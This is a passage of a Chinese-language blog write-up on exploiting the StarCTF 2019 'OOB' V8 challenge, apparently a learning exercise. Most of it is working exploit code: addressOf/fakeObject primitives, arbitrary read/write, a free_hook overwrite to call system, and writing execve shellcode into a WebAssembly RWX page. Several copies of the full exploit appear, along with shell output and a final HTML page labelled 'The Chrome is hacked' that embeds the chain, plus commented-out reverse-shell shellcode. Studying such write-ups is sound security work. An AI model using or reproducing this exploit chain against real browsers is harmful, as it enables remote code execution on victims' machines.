 - elements: 0x26ffa16c0c71 <FixedArray[0]> [HOLEY_ELEMENTS]                 
 - function prototype: <no-prototype-slot>                                   
 - shared_info: 0x33d55dc9fa81 <SharedFunctionInfo 0>       		//通过function找到shared_info              	   
 - name: 0x26ffa16c4ae1 <String[#1]: 0>                                      
 - formal_parameter_count: 0                                                 
 - kind: NormalFunction                                                      
 - context: 0x33d55dc81869 <NativeContext[246]>                              
 - code: 0x19b1b34c2001 <Code JS_TO_WASM_FUNCTION>                           
 - WASM instance 0x33d55dc9f8c1                                              
 - WASM function index 0                                                     
 - properties: 0x26ffa16c0c71 <FixedArray[0]> {                              
    #length: 0x0df20b1804b9 <AccessorInfo> (const accessor descriptor)       
    #name: 0x0df20b180449 <AccessorInfo> (const accessor descriptor)         
    #arguments: 0x0df20b180369 <AccessorInfo> (const accessor descriptor)    
    #caller: 0x0df20b1803d9 <AccessorInfo> (const accessor descriptor)       
 }                                                                           

pwndbg> tele 0x33d55dc9fab8                                                   
00:0000│  0x33d55dc9fab8 —▸ 0x2d22d4b84379 ◂— 0x7000026ffa16c01               
01:0008│  0x33d55dc9fac0 —▸ 0x26ffa16c0c71 ◂— 0x26ffa16c08                    
02:0010│  0x33d55dc9fac8 —▸ 0x26ffa16c0c71 ◂— 0x26ffa16c08                    
03:0018│  0x33d55dc9fad0 —▸ 0x33d55dc9fa81 ◂— 0x59000026ffa16c09   //function_addr + 0x18处存储shared_info    
04:0020│  0x33d55dc9fad8 —▸ 0x33d55dc81869 ◂— 0x26ffa16c0f                    
05:0028│  0x33d55dc9fae0 —▸ 0xdf20b180699 ◂— 0xd1000026ffa16c15               
06:0030│  0x33d55dc9fae8 —▸ 0x19b1b34c2001 ◂— or     ch, byte ptr [rcx - 1]   
07:0038│  0x33d55dc9faf0 —▸ 0x26ffa16c0bc1 ◂— 0x26ffa16c01                    
pwndbg> job 0x33d55dc9fa81                                                    
0x33d55dc9fa81: [SharedFunctionInfo] in OldSpace                              
 - map: 0x26ffa16c09e1 <Map[56]>                                              
 - name: 0x26ffa16c4ae1 <String[#1]: 0>                                       
 - kind: NormalFunction                                                       
 - function_map_index: 144                                                    
 - formal_parameter_count: 0                                                  
 - expected_nof_properties: 0                                                 
 - language_mode: sloppy                                                      
 - data: 0x33d55dc9fa59 <WasmExportedFunctionData>    	//通过shared_info找到WasmExportedFunctionData          
 - code (from data): 0x19b1b34c2001 <Code JS_TO_WASM_FUNCTION>                
 - function token position: -1                                                
 - start position: -1                                                         
 - end position: -1                                                           
 - no debug info                                                              
 - scope info: 0x26ffa16c0c61 <ScopeInfo[0]>                                  
 - length: 0                                                                  
 - feedback_metadata: 0x26ffa16c2a39: [FeedbackMetadata]                      
 - map: 0x26ffa16c1319 <Map>                                                  
 - slot_count: 0                                                              

pwndbg> tele 0x33d55dc9fa80                                                 
00:0000│  0x33d55dc9fa80 —▸ 0x26ffa16c09e1 ◂— 0x7000026ffa16c01             
01:0008│  0x33d55dc9fa88 —▸ 0x33d55dc9fa59 ◂— 0x1000026ffa16c58   //shared_info+0x8处存储的是																																											//WasmExportedFunctionData          
02:0010│  0x33d55dc9fa90 —▸ 0x26ffa16c4ae1 ◂— 0x26ffa16c04                  
03:0018│  0x33d55dc9fa98 —▸ 0x26ffa16c2a39 ◂— 0x26ffa16c13                  
04:0020│  0x33d55dc9faa0 —▸ 0x26ffa16c04d1 ◂— 0x26ffa16c05                  
05:0028│  0x33d55dc9faa8 ◂— 0x0                                             
06:0030│  0x33d55dc9fab0 ◂— 0x0                                             
07:0038│  0x33d55dc9fab8 —▸ 0x2d22d4b84379 ◂— 0x7000026ffa16c01             
pwndbg> job 0x33d55dc9fa59                                                  
0x33d55dc9fa59: [WasmExportedFunctionData] in OldSpace                      
 - map: 0x26ffa16c5879 <Map[40]>                                            
 - wrapper_code: 0x19b1b34c2001 <Code JS_TO_WASM_FUNCTION>                  
 - instance: 0x33d55dc9f8c1 <Instance map = 0x2d22d4b89789>   //通过WasmExportedFunctionData找到instance   
 - function_index: 0                                                        
pwndbg> tele 0x33d55dc9fa58                                                 
00:0000│  0x33d55dc9fa58 —▸ 0x26ffa16c5879 ◂— 0x5000026ffa16c01             
01:0008│  0x33d55dc9fa60 —▸ 0x19b1b34c2001 ◂— or     ch, byte ptr [rcx - 1] 
02:0010│  0x33d55dc9fa68 —▸ 0x33d55dc9f8c1 ◂— 0x7100002d22d4b897   //instance         
03:0018│  0x33d55dc9fa70 ◂— 0x0                                             
04:0020│  0x33d55dc9fa78 ◂— 0x0                                             
05:0028│  0x33d55dc9fa80 —▸ 0x26ffa16c09e1 ◂— 0x7000026ffa16c01             
06:0030│  0x33d55dc9fa88 —▸ 0x33d55dc9fa59 ◂— 0x1000026ffa16c58             
07:0038│  0x33d55dc9fa90 —▸ 0x26ffa16c4ae1 ◂— 0x26ffa16c04                  

pwndbg> job 0x33d55dc9f8c1                                                              
0x33d55dc9f8c1: [WasmInstanceObject] in OldSpace                                        
 - map: 0x2d22d4b89789 <Map(HOLEY_ELEMENTS)> [FastProperties]                           
 - prototype: 0x08c1cea8ac19 <Object map = 0x2d22d4b8abd9>                              
 - elements: 0x26ffa16c0c71 <FixedArray[0]> [HOLEY_ELEMENTS]                            
 - module_object: 0x08c1cea8e621 <Module map = 0x2d22d4b891e9>                          
 - exports_object: 0x08c1cea8e891 <Object map = 0x2d22d4b8ad19>                         
 - native_context: 0x33d55dc81869 <NativeContext[246]>                                  
 - memory_object: 0x33d55dc9f9e9 <Memory map = 0x2d22d4b8a189>                          
 - table 0: 0x08c1cea8e829 <Table map = 0x2d22d4b89aa9>                                 
 - imported_function_refs: 0x26ffa16c0c71 <FixedArray[0]>                               
 - managed_native_allocations: 0x08c1cea8e7d1 <Foreign>                                 
 - memory_start: 0x7f0875760000                                                         
 - memory_size: 65536                                                                   
 - memory_mask: ffff                                                                    
 - imported_function_targets: 0x557d05032470                                            
 - globals_start: (nil)                                                                 
 - imported_mutable_globals: 0x557d05032490                                             
 - indirect_function_table_size: 0                                                      
 - indirect_function_table_sig_ids: (nil)                                               
 - indirect_function_table_targets: (nil)                                               
 - properties: 0x26ffa16c0c71 <FixedArray[0]> {}                                        
                                                                                        
pwndbg> tel 0x33d55dc9f8c0+0x88                                                         
00:0000│  0x33d55dc9f948 —▸ 0xc2f03d8d000 ◂— movabs r10, 0xc2f03d8d260 /* 0xc2f03d8d260b //找到wasm code的地址
a49 */                                                                                  
01:0008│  0x33d55dc9f950 —▸ 0x8c1cea8e621 ◂— 0x7100002d22d4b891                         
02:0010│  0x33d55dc9f958 —▸ 0x8c1cea8e891 ◂— 0x7100002d22d4b8ad                         
03:0018│  0x33d55dc9f960 —▸ 0x33d55dc81869 ◂— 0x26ffa16c0f                              
04:0020│  0x33d55dc9f968 —▸ 0x33d55dc9f9e9 ◂— 0x7100002d22d4b8a1                        
05:0028│  0x33d55dc9f970 —▸ 0x26ffa16c04d1 ◂— 0x26ffa16c05                              
... ↓     2 skipped                                                                     
pwndbg> vmmap 0xc2f03d8d000                                                             
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA                                       
     0xc2f03d8d000      0xc2f03d8e000 rwxp     1000 0      anon_c2f03d8d +0x0

那么，经过上面分析，我们要找到wasm shellcode的地址，可以通过如下方法：

var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);

var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
var f = wasmInstance.exports.main;
var f_addr = addressOf(f);
console.log("[*] leak wasm_func_addr: 0x" + hex(f_addr));

var shared_info_addr = read64(f_addr + 0x18n) - 0x1n;
var wasm_exported_func_data_addr = read64(shared_info_addr + 0x8n) - 0x1n;
var wasm_instance_addr = read64(wasm_exported_func_data_addr + 0x10n) - 0x1n;
var rwx_page_addr = read64(wasm_instance_addr + 0x88n);
console.log("[*] leak rwx_page_addr: 0x" + hex(rwx_page_addr));
%SystemBreak();

漏洞调试

任意读写调试

调试代码如下：

var buf = new ArrayBuffer(16);
var float64 = new Float64Array(buf);
var bigUint64 = new BigUint64Array(buf);
// 浮点数转换为64位无符号整数
function f2i(f)
{
    float64[0] = f;
    return bigUint64[0];
}
// 64位无符号整数转为浮点数
function i2f(i)
{
    bigUint64[0] = i;
    return float64[0];
}
// 64位无符号整数转为16进制字节串
function hex(i)
{
    return i.toString(16).padStart(16, "0");
}
// ××××××××2. addressOf和fakeObject的实现××××××××
var obj = {"a": 1};
var obj_array = [obj];
var float_array = [1.1];
var obj_array_map = obj_array.oob();//oob函数出来的就是map
var float_array_map = float_array.oob();

// 泄露某个object的地址
function addressOf(obj_to_leak)
{
    obj_array[0] = obj_to_leak;
    obj_array.oob(float_array_map);
    let obj_addr = f2i(obj_array[0]) - 1n;//泄漏出来的地址-1才是真实地址
    obj_array.oob(obj_array_map); // 还原array类型以便后续继续使用
    return obj_addr;
}
function fakeObject(addr_to_fake)
{
    float_array[0] = i2f(addr_to_fake + 1n);//地址需要+1才是v8中的正确表达方式
    float_array.oob(obj_array_map);
    let faked_obj = float_array[0];
    float_array.oob(float_array_map); // 还原array类型以便后续继续使用
    return faked_obj;
}
// ××××××××3.read & write anywhere××××××××
// 这是一块我们可以控制的内存
var fake_array = [                //伪造一个对象
    float_array_map,
    i2f(0n),
    i2f(0x41414141n),// fake obj's elements ptr
    i2f(0x1000000000n),
    1.1,
    2.2,
];

// 获取到这块内存的地址
var fake_array_addr = addressOf(fake_array);
// 将可控内存转换为对象
var fake_object_addr = fake_array_addr - 0x30n;
var fake_object = fakeObject(fake_object_addr);
// 任意地址读
function read64(addr)
{
    fake_array[2] = i2f(addr - 0x10n + 0x1n);
    let leak_data = f2i(fake_object[0]);
    return leak_data;
}
// 任意地址写
function write64(addr, data)
{
    fake_array[2] = i2f(addr - 0x10n + 0x1n);
    fake_object[0] = i2f(data);    
}

var a = [1.1,2.2,3.3];
%DebugPrint(a);
var a_addr = addressOf(a);
console.log("[*] addressOf a: 0x" + hex(a_addr));
%SystemBreak();
read64(a_addr);
%SystemBreak();

write64(a_addr,0x01020304n);
%SystemBreak();

首先可以看一下伪造的fake_array_addr和fake_object地址及内存结构：

pwndbg> tele 0x000038378f54fa68 10                              
00:0000│  0x38378f54fa68 —▸ 0x1c2a7edc2ed9 ◂— 0x40000321c83d801 		//fake_object   
01:0008│  0x38378f54fa70 ◂— 0x0                                 		
02:0010│  0x38378f54fa78 ◂— 0x41414141 /* 'AAAA' */             		// fake_object's element
03:0018│  0x38378f54fa80 ◂— 0x1000000000                        
04:0020│  0x38378f54fa88 ◂— 0x3ff199999999999a                  
05:0028│  0x38378f54fa90 ◂— 0x400199999999999a                  
06:0030│  0x38378f54fa98 —▸ 0x1c2a7edc2ed9 ◂— 0x40000321c83d801 		//fake_array_map   float_array_map
07:0038│  0x38378f54faa0 —▸ 0x321c83d80c71 ◂— 0x321c83d808      
08:0040│  0x38378f54faa8 —▸ 0x38378f54fa59 ◂— 0x321c83d814      		//fake_array's element
09:0048│  0x38378f54fab0 ◂— 0x600000000

从上图可以看到：从0x38378f54fa68到0x38378f54fa90地址间的这6个元素是我们输入的fake_array的值。而系统返回的fake_array_addr是0x38378f54fa98。而0x38378f54fa78这个是伪造的fake_object的element地址，伪造的fake_object的map地址可以看到和fake_array的map地址相同，都是float_array_map地址。

那么这里再解释一下任意读写的原理：

1、当我们将fake_object的地址成功伪造为一个对象结构后，那么系统就会认为fake_object是一个浮点数数组对象；

2、我们后续可以通过修改fake_array[2]来修改fake_object的element地址；

3、修改了fake_object's elements地址为target_addr-0x10后，就可以通过读取fake_object[0]将target_addr的值读取或修改了。

pwn利用方法

如果是一个传统的pwn题，那么getshell的方法可以是通过修改free_hook这里虚表指针，来getshell。但是这里首先就有一个问题，怎么泄漏地址。

这种方法好像在之前津门杯做jerry那个js解释器时，用到过。就是通过got表来泄漏地址。那么首先需要得到一个程序基址。这里参考姚老板和xmzyshypnc大哥的博客，找到了一种泄漏地址的方法：

var buf = new ArrayBuffer(16);
var float64 = new Float64Array(buf);
var bigUint64 = new BigUint64Array(buf);
// 浮点数转换为64位无符号整数
function f2i(f)
{
    float64[0] = f;
    return bigUint64[0];
}
// 64位无符号整数转为浮点数
function i2f(i)
{
    bigUint64[0] = i;
    return float64[0];
}
// 64位无符号整数转为16进制字节串
function hex(i)
{
    return i.toString(16).padStart(16, "0");
}
// ××××××××2. addressOf和fakeObject的实现××××××××
var obj = {"a": 1};
var obj_array = [obj];
var float_array = [1.1];
var obj_array_map = obj_array.oob();//oob函数出来的就是map
var float_array_map = float_array.oob();

// 泄露某个object的地址
function addressOf(obj_to_leak)
{
    obj_array[0] = obj_to_leak;
    obj_array.oob(float_array_map);
    let obj_addr = f2i(obj_array[0]) - 1n;//泄漏出来的地址-1才是真实地址
    obj_array.oob(obj_array_map); // 还原array类型以便后续继续使用
    return obj_addr;
}
function fakeObject(addr_to_fake)
{
    float_array[0] = i2f(addr_to_fake + 1n);//地址需要+1才是v8中的正确表达方式
    float_array.oob(obj_array_map);
    let faked_obj = float_array[0];
    float_array.oob(float_array_map); // 还原array类型以便后续继续使用
    return faked_obj;
}
// ××××××××3.read & write anywhere××××××××
// 这是一块我们可以控制的内存
var fake_array = [                //伪造一个对象
    float_array_map,
    i2f(0n),
    i2f(0x41414141n),// fake obj's elements ptr
    i2f(0x1000000000n),
    1.1,
    2.2,
];

// 获取到这块内存的地址
var fake_array_addr = addressOf(fake_array);
// 将可控内存转换为对象
var fake_object_addr = fake_array_addr - 0x30n;
var fake_object = fakeObject(fake_object_addr);
// 任意地址读
function read64(addr)
{
    fake_array[2] = i2f(addr - 0x10n + 0x1n);
    let leak_data = f2i(fake_object[0]);
    return leak_data;
}
// 任意地址写
function write64(addr, data)
{
    fake_array[2] = i2f(addr - 0x10n + 0x1n);
    fake_object[0] = i2f(data);    
}

var data_buf = new ArrayBuffer(8);
var data_view = new DataView(data_buf);
var buf_backing_store_addr = addressOf(data_buf) + 0x20n;
function writeDataview(addr,data){
    write64(buf_backing_store_addr, addr);
    data_view.setBigUint64(0, data, true);
    console.log("[*] write to : 0x" +hex(addr) + ": 0x" + hex(data));
}

// leak libc base
var a = [1.1, 2.2, 3.3];
var start_addr = addressOf(a);
console.log("[*] start_addr: 0x"+hex(start_addr))
var leak_d8_addr = 0n;
start_addr = start_addr-0x4000n;
//%SystemBreak();
while(1){
    start_addr = start_addr+8n;
    leak_d8_addr = read64(start_addr);
    if(((leak_d8_addr&0x0000ff0000000fffn)==0x00005600000007c0n)||((leak_d8_addr&0x0000ff0000000fffn)==0x00005500000007c0n)){
        console.log("leak process addr success: "+hex(leak_d8_addr));
        break;
    }
}

后面泄露地址和Getshel的代码(get_shell里销毁对象会调用free_hook)：

function get_shell(){
    var shell_str = new String("/bin/sh\0");
}

var printf_got = proc_base + 0xd990d0n;

var printf_addr = read64(printf_got);
console.log("[*] printf addr :0x"+hex(printf_addr));
var libc_base = printf_addr - 0x55800n;
console.log("[*] libc base :0x"+hex(libc_base));
var free_hook = libc_base + 0x3c67a8n;
var system_addr = libc_base + 0x45390n;

writeDataview(free_hook,system_addr);
get_shell();

最终的exp如下：

var buf = new ArrayBuffer(16);
var float64 = new Float64Array(buf);
var bigUint64 = new BigUint64Array(buf);
// 浮点数转换为64位无符号整数
function f2i(f)
{
    float64[0] = f;
    return bigUint64[0];
}
// 64位无符号整数转为浮点数
function i2f(i)
{
    bigUint64[0] = i;
    return float64[0];
}
// 64位无符号整数转为16进制字节串
function hex(i)
{
    return i.toString(16).padStart(16, "0");
}
// ××××××××2. addressOf和fakeObject的实现××××××××
var obj = {"a": 1};
var obj_array = [obj];
var float_array = [1.1];
var obj_array_map = obj_array.oob();//oob函数出来的就是map
var float_array_map = float_array.oob();

// 泄露某个object的地址
function addressOf(obj_to_leak)
{
    obj_array[0] = obj_to_leak;
    obj_array.oob(float_array_map);
    let obj_addr = f2i(obj_array[0]) - 1n;//泄漏出来的地址-1才是真实地址
    obj_array.oob(obj_array_map); // 还原array类型以便后续继续使用
    return obj_addr;
}
function fakeObject(addr_to_fake)
{
    float_array[0] = i2f(addr_to_fake + 1n);//地址需要+1才是v8中的正确表达方式
    float_array.oob(obj_array_map);
    let faked_obj = float_array[0];
    float_array.oob(float_array_map); // 还原array类型以便后续继续使用
    return faked_obj;
}
// ××××××××3.read & write anywhere××××××××
// 这是一块我们可以控制的内存
var fake_array = [                //伪造一个对象
    float_array_map,
    i2f(0n),
    i2f(0x41414141n),// fake obj's elements ptr
    i2f(0x1000000000n),
    1.1,
    2.2,
];

// 获取到这块内存的地址
var fake_array_addr = addressOf(fake_array);
// 将可控内存转换为对象
var fake_object_addr = fake_array_addr - 0x30n;
var fake_object = fakeObject(fake_object_addr);
// 任意地址读
function read64(addr)
{
    fake_array[2] = i2f(addr - 0x10n + 0x1n);
    let leak_data = f2i(fake_object[0]);
    return leak_data;
}
// 任意地址写
function write64(addr, data)
{
    fake_array[2] = i2f(addr - 0x10n + 0x1n);
    fake_object[0] = i2f(data);    
}

var data_buf = new ArrayBuffer(8);
var data_view = new DataView(data_buf);
var buf_backing_store_addr = addressOf(data_buf) + 0x20n;
function writeDataview(addr,data){
    write64(buf_backing_store_addr, addr);
    data_view.setBigUint64(0, data, true);
    console.log("[*] write to : 0x" +hex(addr) + ": 0x" + hex(data));
}
// leak libc base
var a = [1.1, 2.2, 3.3];
var start_addr = addressOf(a);
console.log("[*] start_addr: 0x"+hex(start_addr))
var leak_d8_addr = 0n;
start_addr = start_addr-0x4000n;
//%SystemBreak();
while(1){
    start_addr = start_addr+8n;
    leak_d8_addr = read64(start_addr);
    if(((leak_d8_addr&0x0000ff0000000fffn)==0x00005600000007c0n)||((leak_d8_addr&0x0000ff0000000fffn)==0x00005500000007c0n)){
        console.log("leak process addr success: "+hex(leak_d8_addr));
        break;
    }
}

var plt_base = leak_d8_addr - 0x99c7c0n;
function get_shell(){
    var shell_str = new String("/bin/sh\0");
}

var printf_got = plt_base + 0xd9b3d8n;

var printf_addr = read64(printf_got);
console.log("[*] printf addr :0x"+hex(printf_addr));
var libc_base = printf_addr - 0x64e10n;
console.log("[*] libc base :0x"+hex(libc_base));
var free_hook = libc_base + 0x1eeb28n;
var system_addr = libc_base + 0x55410n;

writeDataview(free_hook,system_addr);
get_shell();

最终getshell：

alex@ubuntu:~/v8/traning/starctf-oob/v8/out.gn/x64.release$ ./d8 ./shell.js 
[*] start_addr: 0x0000110e9b0d0390
leak process addr success: 00005642a9d4c7c0
[*] printf addr :0x00007f80588a1e10
[*] libc base :0x00007f805883d000
sh: 1: [*]: not found
[*] write to : 0x00007f8058a2bb28: 0x00007f8058892410
sh: 1: -BV: not found
sh: 1: .BV: not found
sh: 1: .BV: not found
sh: 1: HBV: not found
sh: 1: newll_str: not found
$ id
uid=1000(alex) gid=1000(alex) groups=1000(alex),4(adm),24(cdrom),27(sudo),30(dip),46(plu
gdev),120(lpadmin),131(lxd),132(sambashare)
$

Wasm getshell

编写一段引入wasm的js代码，在debug版本的d8中来查看wasm代码所在的地址，js代码如下，可以在这个网站：https://wasdk.github.io/WasmFiddle/

// shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91 \xd0\x8c\x97\xff\x48\xf7\xdb\x53 \x54\x5f\x99\x52\x57\x54\x5e\xb0 \x3b\x0f\x05";
shellcode = [
    0x91969dd1bb48c031n,
    0x53dbf748ff978cd0n,
    0xb05e545752995f54n,
    0x50f3bn
];

var data_buf = new ArrayBuffer(32);
var data_view = new DataView(data_buf);
var buf_backing_store_addr = addressOf(data_buf) + 0x20n;
write64(buf_backing_store_addr, rwx_page_addr);
for (var i = 0; i < shellcode.length; i++)
    data_view.setBigUint64(8*i, shellcode[i], true);

// trigger shellcode
f();

前面，我们已经分析了如何找到wasm代码的rwx页面地址。然后，我们通过任意写将该页面地址写入data_view中的data_buf的值。这样以后使用data_view写就会直接将shellcode写入rwx页面。

最后，就是去执行wasm函数，来执行shellcode。

var buf = new ArrayBuffer(16);
var float64 = new Float64Array(buf);
var bigUint64 = new BigUint64Array(buf);
// 浮点数转换为64位无符号整数
function f2i(f)
{
    float64[0] = f;
    return bigUint64[0];
}
// 64位无符号整数转为浮点数
function i2f(i)
{
    bigUint64[0] = i;
    return float64[0];
}
// 64位无符号整数转为16进制字节串
function hex(i)
{
    return i.toString(16).padStart(16, "0");
}
// ××××××××2. addressOf和fakeObject的实现××××××××
var obj = {"a": 1};
var obj_array = [obj];
var float_array = [1.1];
var obj_array_map = obj_array.oob();//oob函数出来的就是map
var float_array_map = float_array.oob();

// 泄露某个object的地址
function addressOf(obj_to_leak)
{
    obj_array[0] = obj_to_leak;
    obj_array.oob(float_array_map);
    let obj_addr = f2i(obj_array[0]) - 1n;//泄漏出来的地址-1才是真实地址
    obj_array.oob(obj_array_map); // 还原array类型以便后续继续使用
    return obj_addr;
}
function fakeObject(addr_to_fake)
{
    float_array[0] = i2f(addr_to_fake + 1n);//地址需要+1才是v8中的正确表达方式
    float_array.oob(obj_array_map);
    let faked_obj = float_array[0];
    float_array.oob(float_array_map); // 还原array类型以便后续继续使用
    return faked_obj;
}
// ××××××××3.read & write anywhere××××××××
// 这是一块我们可以控制的内存
var fake_array = [                //伪造一个对象
    float_array_map,
    i2f(0n),
    i2f(0x41414141n),// fake obj's elements ptr
    i2f(0x1000000000n),
    1.1,
    2.2,
];

// 获取到这块内存的地址
var fake_array_addr = addressOf(fake_array);
// 将可控内存转换为对象
var fake_object_addr = fake_array_addr - 0x30n;
var fake_object = fakeObject(fake_object_addr);
// 任意地址读
function read64(addr)
{
    fake_array[2] = i2f(addr - 0x10n + 0x1n);
    let leak_data = f2i(fake_object[0]);
    return leak_data;
}
// 任意地址写
function write64(addr, data)
{
    fake_array[2] = i2f(addr - 0x10n + 0x1n);
    fake_object[0] = i2f(data);    
}
//data_view任意写
var data_buf = new ArrayBuffer(8);
var data_view = new DataView(data_buf);
var buf_backing_store_addr = addressOf(data_buf) + 0x20n;
function writeDataview(addr,data){
    write64(buf_backing_store_addr, addr);
    data_view.setBigUint64(0, data, true);
    console.log("[*] write to : 0x" +hex(addr) + ": 0x" + hex(data));
}

var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);

var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
var f = wasmInstance.exports.main;
var f_addr = addressOf(f);
console.log("[*] leak wasm_func_addr: 0x" + hex(f_addr));

var shared_info_addr = read64(f_addr + 0x18n) - 0x1n;
var wasm_exported_func_data_addr = read64(shared_info_addr + 0x8n) - 0x1n;
var wasm_instance_addr = read64(wasm_exported_func_data_addr + 0x10n) - 0x1n;
var rwx_page_addr = read64(wasm_instance_addr + 0x88n);
console.log("[*] leak rwx_page_addr: 0x" + hex(rwx_page_addr));

shellcode = [
    0x91969dd1bb48c031n,
    0x53dbf748ff978cd0n,
    0xb05e545752995f54n,
    0x50f3bn
];

var data_buf = new ArrayBuffer(32);
var data_view = new DataView(data_buf);
var buf_backing_store_addr = addressOf(data_buf) + 0x20n;
write64(buf_backing_store_addr, rwx_page_addr);
for (var i = 0; i < shellcode.length; i++)
    data_view.setBigUint64(8*i, shellcode[i], true);

// trigger shellcode
f();

最终结果：

alex@ubuntu:~/v8/traning/starctf-oob/v8/out.gn/x64.release$ ./d8 ./wasm_sc.js 
[*] leak wasm_func_addr: 0x00000abe7f5226f8
[*] leak rwx_page_addr: 0x00003227ff664000
$ id
uid=1000(alex) gid=1000(alex) groups=1000(alex),4(adm),24(cdrom),27(sudo),30(dip),46(plu
gdev),120(lpadmin),131(lxd),132(sambashare)
$

远程getshell

前面的getshell都是本地的，这里我们可以使用反弹shell。

但是，我想直接弹计算器，但是一直会有问题。有哪位大佬，知道该怎么解决吗？

EXP

<!DOCTYPE html>
<html>
<body>

<h2>The Chrome is hacked by A1ex :)!</h2>

<script>
var buf =new ArrayBuffer(16);
var float64 = new Float64Array(buf);
var bigUint64 = new BigUint64Array(buf);
// 浮点数转换为64位无符号整数
function f2i(f)
{
    float64[0] = f;
    return bigUint64[0];
}
// 64位无符号整数转为浮点数
function i2f(i)
{
    bigUint64[0] = i;
    return float64[0];
}
// 64位无符号整数转为16进制字节串
function hex(i)
{
    return i.toString(16).padStart(16, "0");
}


var obj = {"a": 1};
var obj_array = [obj];
var float_array = [1.1];
var obj_array_map = obj_array.oob();
var float_array_map = float_array.oob();
// %DebugPrint(float_array_map);
// %SystemBreak();


function addressOf(obj_to_leak){
    obj_array[0] = obj_to_leak;
    // type(obj)-->type(float)
    obj_array.oob(float_array_map);
    let addr = f2i(obj_array[0])-1n;
    obj_array.oob(obj_array_map);
    return addr;
}

function fakeObject(addr_to_fake){
    float_array[0] = i2f(addr_to_fake+1n);
    // type(float)-->type(obj)
    float_array.oob(obj_array_map);
    let fake_obj = float_array[0];
    float_array.oob(float_array_map);
    return fake_obj;
}

// read & write anywhere
var fake_array = [
    float_array_map,
    i2f(0n),
    i2f(0x41414141n),
    i2f(0x1000000000n),
    1.1,
    2.2,
];

var fake_array_addr = addressOf(fake_array);
var fake_object_addr = fake_array_addr - 0x40n + 0x10n;
var fake_object = fakeObject(fake_object_addr);
function read64(addr)
{
    fake_array[2] = i2f(addr - 0x10n + 0x1n);
    let leak_data = f2i(fake_object[0]);
    // console.log("fake obj: 0x"+hex(f2i(fake_object[0])));
    // console.log("[*] leak from: 0x" +hex(addr) + ": 0x" + hex(leak_data));
    return leak_data;
}

function write64(addr, data)
{
    fake_array[2] = i2f(addr - 0x10n + 0x1n);
    // console.log("[*] fakeobj addr: 0x"+hex(addressOf(fake_object)));
    fake_object[0] = i2f(data);
    console.log("[*] write to : 0x" +hex(addr) + ": 0x" + hex(data));    
}

var data_buf = new ArrayBuffer(8);
var data_view = new DataView(data_buf);
var buf_backing_store_addr = addressOf(data_buf) + 0x20n;
function writeDataview(addr,data){
    write64(buf_backing_store_addr, addr);
    data_view.setBigUint64(0, data, true);
    // %SystemBreak();
    console.log("[*] write to : 0x" +hex(addr) + ": 0x" + hex(data));
}


var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
var f = wasmInstance.exports.main;

var f_addr = addressOf(f);
console.log("f addr: 0x"+hex(f_addr));
var shared_info_addr = read64(f_addr+0x18n)-0x1n;
var wasm_exported_function = read64(shared_info_addr+8n)-1n;
var instance_addr = read64(wasm_exported_function+0x10n)-1n;
var rwx_page_addr = read64(instance_addr+0x88n);
console.log("rwx page addr: 0x"+hex(rwx_page_addr));

/*shellcode = [
    0x6a5f026a9958296an,
    0xb9489748050f5e01n,
    0xbc9ae16808520002n,
    0x6a5a106ae6894851n,
    0x485e036a050f582an,
    0x75050f58216aceffn,
    0x2fbb4899583b6af6n,
    0x530068732f6e6962n,
    0xe689485752e78948n,
    0x50fn
    ];
*/
shellcode = [
0x010101010101b848n,
0x792eb84850010101n,
0x480101626d606279n,
0x752fb84824043148n,
0x506e69622f727375n,
0x01313b68e7894850n,
0x0101012434810101n,
0x50534944b8480101n,
0xd231503d59414c50n,
0xe201485a086a52d2n,
0x01b848e2894852e2n,
0x0101010101010101n,
0x6d606279b8485001n,
0x043148010101626dn,
0x5e086a56f6312404n,
0xe6894856e601485en,
0x050f583b6ae6n
];

var data_buf = new ArrayBuffer(180);
var data_view = new DataView(data_buf);
var buf_backing_store_addr = addressOf(data_buf) + 0x20n;
write64(buf_backing_store_addr, rwx_page_addr);
for (var i = 0; i < shellcode.length; i++)
    data_view.setBigUint64(8*i, shellcode[i], true);

f();

</script> 
</body>
</html>

总结

这道题总体来说不是很难，并没有涉及很多v8的知识。非常适合我们这种对Chrome没有太多基础的人用来入门。这道题让我对v8的漏洞点、利用方法以及调试方法有了一个大概的接触，但是并没有对v8内部的处理逻辑、代码、算法有很多的分析，调试的时候也没有去具体调试v8的执行逻辑。这一块是需要后面去加强学习的。

参考

浏览器入门之starctf-OOB

chrome study by v8 oob

StarCTF 2019 OOB

本文作者： A1ex
本文链接： http://yoursite.com/2021/09/17/Chorme-v8-入门学习/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！